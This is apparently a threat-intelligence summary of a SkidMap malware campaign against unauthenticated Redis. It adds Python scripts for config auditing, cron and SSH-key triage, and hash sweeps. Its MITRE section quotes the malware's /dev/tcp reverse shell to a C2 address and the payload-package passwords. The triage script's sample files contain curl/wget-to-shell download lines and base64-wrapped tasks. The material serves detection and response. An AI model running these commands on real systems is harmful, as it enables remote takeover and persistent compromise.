Honeypot Recon: New Variant of SkidMap Targeting Redis

A new and more dangerous variant of SkidMap was observed targeting unsecured Redis NO AUTH instances, featuring dual Linux infection paths (Debian/Ubuntu and RedHat/CentOS) and a sophisticated multi-stage payload chain including dropper delivery, backdoor installation, kernel modules, and a memory-resident miner. The campaign uses encrypted packages (gold, stream, euler), SSH backdoors, and cron-based C2 callbacks, complicating detection and remediation. #SkidMap #Redis #LinuxKernelModule #Cryptominer #Trustwave #SpiderLabs

Keypoints

  • Open Redis instances (NO AUTH) are targeted to initiate the infection.
  • Two main Linux infection paths are identified: Debian/Ubuntu and RedHat/CentOS, each with distinct infection options.
  • The Redis stage writes cron-driven tasks that download and execute a dropper script (b) from a remote host.
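
The first keypoint is the only precondition the campaign needs: a Redis instance reachable with no authentication. As an added example (not code from the Trustwave post), the following Python script audits a redis.conf for the settings that create that exposure and shows a weak configuration beside its hardened counterpart. The sample configs, the finding codes and the `audit_redis_conf` function are all constructed here; the directives checked (`bind`, `protected-mode`, `requirepass`, `rename-command`) are standard Redis settings.

```python
# Added example, not from the Trustwave post: audit a redis.conf for the
# exposure the SkidMap Redis stage relies on (an instance reachable with
# no authentication). Sample configs and finding codes are constructed here.
import shlex
from typing import Dict, List, Tuple

# Constructed sample: listens on every interface, no password, CONFIG reachable.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
# requirepass left commented out, so any client gets a NO AUTH session
# requirepass change-me
"""

# Constructed sample: the hardened counterpart.
HARDENED_CONF = """
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass use-a-long-random-secret-here
rename-command CONFIG ""
rename-command FLUSHALL ""
"""

Finding = Tuple[str, str]  # (code, human-readable detail)


def parse_redis_conf(text: str) -> Dict[str, List[List[str]]]:
    """Map each directive (lower-cased) to the argument lists of its occurrences.

    Comment and blank lines are skipped; shlex handles quoted arguments such as
    the empty string in `rename-command CONFIG ""`.
    """
    directives: Dict[str, List[List[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        directives.setdefault(parts[0].lower(), []).append(parts[1:])
    return directives


def audit_redis_conf(text: str) -> List[Finding]:
    """Return the weak settings found; an empty list means no check fired."""
    conf = parse_redis_conf(text)
    findings: List[Finding] = []

    # 1. Binding to all interfaces is what makes the instance visible to the
    #    internet-wide scans that locate NO AUTH Redis in the first place.
    binds = [addr for args in conf.get("bind", []) for addr in args]
    if not binds or any(addr in ("0.0.0.0", "*", "::") for addr in binds):
        findings.append(("BIND_ALL", "bind missing or set to all interfaces"))

    # 2. protected-mode is Redis's own guard against unauthenticated remote
    #    clients; the last occurrence wins and the default is "yes".
    protected = conf.get("protected-mode", [["yes"]])[-1]
    if protected and protected[0].lower() == "no":
        findings.append(("PROTECTED_MODE_OFF", "protected-mode no"))

    # 3. No requirepass is exactly the "NO AUTH" condition the campaign targets.
    password = conf.get("requirepass", [[]])[-1]
    if not password or not password[0]:
        findings.append(("NO_AUTH", "requirepass not set"))

    # 4. Redis hardening guides disable CONFIG on exposed instances (it changes
    #    runtime settings remotely); renaming it to "" turns it off.
    renamed = {args[0].upper(): args[1]
               for args in conf.get("rename-command", []) if len(args) == 2}
    if renamed.get("CONFIG", "CONFIG") == "CONFIG":
        findings.append(("CONFIG_EXPOSED", "CONFIG command not disabled via rename-command"))

    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or "no findings")
```

Run it against a live server's config file (`redis-cli CONFIG GET` output can be dumped into the same directive format) and treat any `NO_AUTH` or `BIND_ALL` finding on an internet-facing host as the precondition for the Redis stage described above.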

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The attacker logs in to the unauthenticated Redis instance and stores values that carry cron tasks hidden in a base64 string. – “The attack starts with an attempt to login to the unsecured Redis instance and set up variables that contain cron tasks hidden under a base64 string.”
  • [T1053.005] Cron – A cron job runs every 10 minutes, alternating between ‘curl’ and ‘wget’, to download and execute the dropper script ‘b’. – “Cron runs a job every 10 minutes by alternating between ‘curl’ and ‘wget’ to download and execute the dropper script ‘b’.”
  • [T1098] SSH Authorized Keys – The malware adds SSH keys to root for persistent access. – “The following ssh keys in standard locations: ‘/root/.ssh/authoried_keys’ and ‘/root/.ssh/authoried_keys2’.”
  • [T1562.001] Impair Defenses – The malware checks SELinux status and disables it permanently. – “The next step is to check the status of SELinux, then disable it permanently: /usr/sbin/sestatus … /usr/sbin/setenforce disabled.”
  • [T1059.004] Unix Shell – A reverse shell is created via a cron-based call to a remote C2 server. – “The most interesting part is the highlighted line responsible for creating a reverse shell that will call back to the attacker-controlled server (C2) every hour via TCP port 8443: echo ‘bash -i >& /dev/tcp/69.30.221[.]154/8443 0>&1’ >> /etc/cron.hourly/prelink”
  • [T1027] Obfuscated/Compressed Files and Information – Encoded/encrypted payloads are decrypted and executed; passwords for encrypted packages are provided (Xo@2089@md, go@1992@ld). – “This stage … decrypts accordingly and initiates executing shell scripts, installing kernel modules, followed by placing other executable binaries. … The password for the ‘gold’ packages is ‘Xo@2089@md’. For the ‘jpeg’ variant, the password is ‘go@1992@ld’.”
  • [T1014] Rootkit – Discovery of hidden LKM rootkits in memory to hide activity. – “Static analysis of the memory dump confirmed two hidden malicious modules … Figure 17 – Hidden LKM rootkits.”
  • [T1016] System Network Configuration Discovery – Kernel modules monitor network traffic via Netfilter hooks. – “The task of this module is to monitor the network using Netfilter hooks.” (kmeminfo.ko)
  • [T1105] Ingress Tool Transfer – The bot downloads additional files from Canonical resources to support infection. – “Right after execution, the ‘bot’ downloads extra files. In the case of the Debian/Ubuntu variant, we observed connection to the official Canonical resources in order to download files required by the infection process.”
  • [T1012] Resource Development (Kernel Modules) – Kernel modules (mcpuinfo.ko, kmeminfo.ko) extend capabilities and enable persistence/stealth. – “Extracted Module – mcpuinfo.ko … Kernel Module – mzoneinfo.ko (?)”
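
The cron, SSH-key and reverse-shell items above are all things a responder can check on disk. As an added example (not code from the Trustwave post), the Python script below runs a triage pass over cron and root SSH-key contents and flags: download-and-execute pipelines built on curl or wget, base64-wrapped cron tasks (unwrapped one level and rescanned), `/dev/tcp` reverse shells, keys in root's authorized_keys files, and the dropper host and C2 address the post lists. The IoC host values come from the post; the file contents in `SAMPLE_FILES`, the rule names and the functions are constructed here.

```python
# Added example, not from the Trustwave post: host triage over cron and root
# SSH-key files for the persistence patterns the post describes. IOC_HOSTS are
# the post's values; the sample file contents below are constructed.
import base64
import re
from typing import Dict, List, Set, Tuple

IOC_HOSTS = {"z.shavsl.com", "69.30.221.154"}  # dropper host and C2 from the post

RE_REVERSE_SHELL = re.compile(r"/dev/tcp/([\w.\-]+)/(\d+)")
RE_DOWNLOAD_EXEC = re.compile(r"\b(?:curl|wget)\b[^\n]*?\|\s*(?:ba)?sh\b")
RE_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

Finding = Tuple[str, str, str]  # (path, rule, evidence)


def decode_base64_tokens(text: str) -> List[str]:
    """Decode every base64-looking token that yields printable ASCII text."""
    decoded = []
    for token in RE_B64_TOKEN.findall(text):
        try:
            raw = base64.b64decode(token, validate=True).decode("ascii")
        except ValueError:  # bad padding, non-alphabet chars, or binary output
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in raw):
            decoded.append(raw)
    return decoded


def scan_text(path: str, text: str, nested: bool = False) -> List[Finding]:
    """Apply the pattern rules to one file's text; base64 is unwrapped one level."""
    findings: List[Finding] = []
    for m in RE_REVERSE_SHELL.finditer(text):
        findings.append((path, "REVERSE_SHELL", f"{m.group(1)}:{m.group(2)}"))
    for m in RE_DOWNLOAD_EXEC.finditer(text):
        findings.append((path, "DOWNLOAD_EXEC", m.group(0).strip()))
    for host in sorted(IOC_HOSTS):
        if host in text:
            findings.append((path, "IOC_MATCH", host))
    if not nested:  # the post's cron tasks hide the command under base64
        for inner_text in decode_base64_tokens(text):
            inner = scan_text(path, inner_text, nested=True)
            if inner:
                findings.append((path, "BASE64_PAYLOAD", inner_text.strip()))
                findings.extend(inner)
    return findings


def triage(files: Dict[str, str]) -> List[Finding]:
    """files maps a path to its content, read from a live host or a disk image."""
    findings: List[Finding] = []
    for path, text in files.items():
        findings.extend(scan_text(path, text))
        # Any key in root's authorized_keys* is worth a human look after a Redis compromise.
        if path.startswith("/root/.ssh/authorized_keys"):
            for line in text.splitlines():
                if line.strip() and not line.startswith("#"):
                    findings.append((path, "ROOT_SSH_KEY", line.split()[-1]))
    return findings


def rules_by_path(findings: List[Finding]) -> Dict[str, Set[str]]:
    grouped: Dict[str, Set[str]] = {}
    for path, rule, _ in findings:
        grouped.setdefault(path, set()).add(rule)
    return grouped


# Constructed sample inputs; the base64 wraps a one-line download-and-run task.
_ENCODED_TASK = base64.b64encode(b"curl -fsSL http://z.shavsl.com/b | sh").decode()
SAMPLE_FILES = {
    "/var/spool/cron/root": (
        "*/10 * * * * (curl -fsSL http://z.shavsl.com/b || wget -q -O - http://z.shavsl.com/b) | sh\n"
        "0 3 * * * /usr/bin/certbot renew --quiet\n"
    ),
    "/var/spool/cron/www-data": f"* * * * * echo {_ENCODED_TASK} | base64 -d | sh\n",
    "/etc/cron.hourly/prelink": "#!/bin/sh\nbash -i >& /dev/tcp/69.30.221.154/8443 0>&1\n",
    "/root/.ssh/authorized_keys2": "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedPlaceholderKey skidmap@example\n",
    "/etc/cron.d/certbot": "0 */12 * * * root /usr/bin/certbot -q renew\n",
}

if __name__ == "__main__":
    for finding in triage(SAMPLE_FILES):
        print(*finding, sep="\t")
```

The benign certbot entries produce no findings, which is the point of pattern rules rather than a blanket "any cron job" alert; the base64 unwrapping is limited to one level because that is how the post describes the hidden tasks, and deeper nesting would be a separate rule.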

Indicators of Compromise

  • [File Name] b, c, f – dropper script names observed during the Redis stage
  • [Hash] MD5 000916c60b2ab828ba8cea914c308999 (for b, c, f); SHA1 9970809e1dedce286888f7d25790b4dcca1e704b; SHA256 969e10e4a61cc5f80c414259c4d90c74bcf43ccd5678910700bdc14cd60f9725
  • [File Name] gif – backdoor binary placed in /var/lib/gif
  • [Hash] MD5 e23b3c7eb5d68e3cd43e9e61a3055fe8; SHA1 940f45f8a5dfb16281a35cd8303cd98c1ab1fabd; SHA256 f77c4b704b20affdd737af44cabd3d7b56d8987924f2179137bbeef0e4be0367
  • [File Name] jpeg – variant of dropper/encapsulated payload (encrypted as described)
  • [Hash] MD5 e23b3c7eb5d68e3cd43e9e61a3055fe8; SHA1 940f45f8a5dfb16281a35cd8303cd98c1ab1fabd; SHA256 f77c4b704b20affdd737af44cabd3d7b56d8987924f2179137bbeef0e4be0367
  • [File Name] .miner – miner payload with MD5 44de739950eb4a8a3552b4e1987e8ec2; SHA1 0ae049aab363fb8d2e164150dffbafd332725e00; SHA256 9b81bad2111312e669697b69b9f121a1f9519da61cd5d37689e38381c1ffad28
  • [File Name] bot – bot ELF with MD5 49ad1db4b61bb1f23cdcaeb546c6d154; SHA1 47afaf89bb98705bb0b6eb2b14bdb8eaf84694fa; SHA256 1395201601e80b6f0733feb5bc6dee2d5d2b853fb157185486810457b329d712
  • [IP Address] 69.30.221.154 – C2 server contacted by the malware (reverse shell). – “every hour via TCP/8443 port” to this IP.
  • [Domain] z.shavsl.com – dropper/C2 host in the Redis stage (obfuscated in article). – “hxxp://z[.]shavsl[.]com/b”
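
The hashes and drop locations above are most useful when swept across a filesystem or a mounted disk image. As an added example (not code from the Trustwave post), the Python script below hashes every regular file under a root directory in a single pass (MD5, SHA1 and SHA256, since the post lists all three), matches the digests against the post's hash set, and flags the two on-disk locations the post names (`/var/lib/gif` and `/etc/cron.hourly/prelink`) plus the `.miner` file name. The hash values and paths come from the post; the sample tree that `build_sample_tree` plants, and the extra hash `demo` adds so the sample produces a hit, are constructed here.

```python
# Added example, not from the Trustwave post: sweep a filesystem (or mounted
# image) for the hashes and drop locations the post lists. Only the hash values
# and the two paths come from the post; the sample tree is constructed here.
import hashlib
import os
import tempfile
from typing import Dict, List, Set, Tuple

# All MD5/SHA1/SHA256 values listed in the post. The post gives the same three
# hashes for "gif" and "jpeg", so the set holds 12 distinct values.
SKIDMAP_HASHES: Set[str] = {
    "000916c60b2ab828ba8cea914c308999", "9970809e1dedce286888f7d25790b4dcca1e704b",
    "969e10e4a61cc5f80c414259c4d90c74bcf43ccd5678910700bdc14cd60f9725",
    "e23b3c7eb5d68e3cd43e9e61a3055fe8", "940f45f8a5dfb16281a35cd8303cd98c1ab1fabd",
    "f77c4b704b20affdd737af44cabd3d7b56d8987924f2179137bbeef0e4be0367",
    "44de739950eb4a8a3552b4e1987e8ec2", "0ae049aab363fb8d2e164150dffbafd332725e00",
    "9b81bad2111312e669697b69b9f121a1f9519da61cd5d37689e38381c1ffad28",
    "49ad1db4b61bb1f23cdcaeb546c6d154", "47afaf89bb98705bb0b6eb2b14bdb8eaf84694fa",
    "1395201601e80b6f0733feb5bc6dee2d5d2b853fb157185486810457b329d712",
}
# Drop locations named in the post, relative to the scanned root.
SKIDMAP_PATHS: Set[str] = {"var/lib/gif", "etc/cron.hourly/prelink"}

Hit = Tuple[str, str, str]  # (relative path, rule, evidence)


def file_digests(path: str, chunk: int = 1 << 16) -> Dict[str, str]:
    """MD5, SHA1 and SHA256 of one file, computed in a single read pass."""
    digests = {"md5": hashlib.md5(), "sha1": hashlib.sha1(), "sha256": hashlib.sha256()}
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            for d in digests.values():
                d.update(block)
    return {name: d.hexdigest() for name, d in digests.items()}


def sweep(root: str, hashes: Set[str] = SKIDMAP_HASHES,
          paths: Set[str] = SKIDMAP_PATHS) -> List[Hit]:
    """Walk root and report known drop paths and any file whose digest is an IoC."""
    hits: List[Hit] = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # symlinks and special files are skipped, never followed
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if rel in paths or name == ".miner":
                hits.append((rel, "KNOWN_PATH", name))
            for algo, hexdigest in file_digests(full).items():
                if hexdigest in hashes:
                    hits.append((rel, "HASH_MATCH", f"{algo}:{hexdigest}"))
    return sorted(hits)


def build_sample_tree(root: str) -> str:
    """Plant constructed files and return the SHA256 of the planted 'gif' so the
    demo can show a hash hit (a real sweep uses SKIDMAP_HASHES alone)."""
    planted = b"constructed stand-in for the backdoor binary\n"
    for rel, content in (
        ("var/lib/gif", planted),
        ("etc/cron.hourly/prelink", b"#!/bin/sh\n# constructed cron script\n"),
        ("usr/bin/true", b"\x7fELF constructed benign file\n"),
    ):
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return hashlib.sha256(planted).hexdigest()


def demo() -> List[Hit]:
    """Sweep a temporary constructed tree; the planted hash is added only for the demo."""
    with tempfile.TemporaryDirectory() as root:
        planted_sha256 = build_sample_tree(root)
        return sweep(root, hashes=SKIDMAP_HASHES | {planted_sha256})


if __name__ == "__main__":
    for hit in demo():
        print(*hit, sep="\t")
```

Point `sweep` at a mounted image rather than the live root of a suspect host where you can: the post's LKM rootkits hide activity from the running kernel, so a hash sweep from inside the infected system can miss exactly the files it is looking for.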

Read more: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-skidmap-targeting-redis/